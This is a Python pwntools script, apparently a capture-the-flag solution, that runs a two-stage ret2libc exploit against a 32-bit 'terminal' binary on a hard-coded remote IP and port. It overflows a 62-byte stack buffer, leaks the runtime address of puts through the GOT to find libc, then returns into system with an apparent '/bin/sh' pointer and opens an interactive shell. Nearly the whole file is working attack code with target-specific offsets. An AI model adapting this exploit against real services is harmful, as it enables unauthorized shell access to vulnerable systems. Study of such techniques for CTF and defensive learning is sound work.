#!/usr/bin/python3
"""Two-stage ret2libc proof-of-concept for the 32-bit ``terminal`` binary.

Stage 1 overflows the stack buffer and returns into ``puts`` to print the
GOT entry of ``puts`` itself, which reveals where libc is mapped.  Stage 2
repeats the overflow and returns into ``system`` with the leak-derived
addresses.  All libc offsets below are specific to the libc on the remote
target; they are not portable to another build.
"""
from pwn import *

context.binary = target = ELF("./terminal", checksec=False)

# Remote challenge instance; the commented line is the local-run alternative.
# r = process()
r = remote("20.199.76.210", 1005)

# libc offsets (relative to the mapping base) for the target's libc build
PUTS_OFF = 0x76aa0
SYSTEM_OFF = 0x4f8f0
SH_OFF = 0x1bcde8      # presumably a "/bin/sh" string -- not shown on this page

# Overflow filler: 62 bytes reach the saved return address.
PADDING = b"A" * 62


def s(a):
    """Wait for the ``# `` prompt, then send *a* as one line."""
    return r.sendlineafter(b"# ", a)


# --- stage 1: leak -------------------------------------------------------
# ret -> puts@plt, "return address" -> gadget at 0x804974d, arg -> puts@got
leak_chain = b"".join([
    PADDING,
    p32(target.sym.puts),
    p32(0x804974d),
    p32(target.got.puts),
])
s(leak_chain)

# first 4 bytes printed back are the little-endian runtime address of puts
puts = u32(r.recv(4))
log.info("puts: 0x%lx", puts)

libc_base = puts - PUTS_OFF
log.info("libc: 0x%lx", libc_base)
system = libc_base + SYSTEM_OFF
log.info("system: 0x%lx", system)
sh = libc_base + SH_OFF

# --- stage 2: shell ------------------------------------------------------
# ret -> system, placeholder return address, first argument -> sh
shell_chain = b"".join([
    PADDING,
    p32(system),
    b"BLUH",
    p32(sh),
])
s(shell_chain)

r.interactive()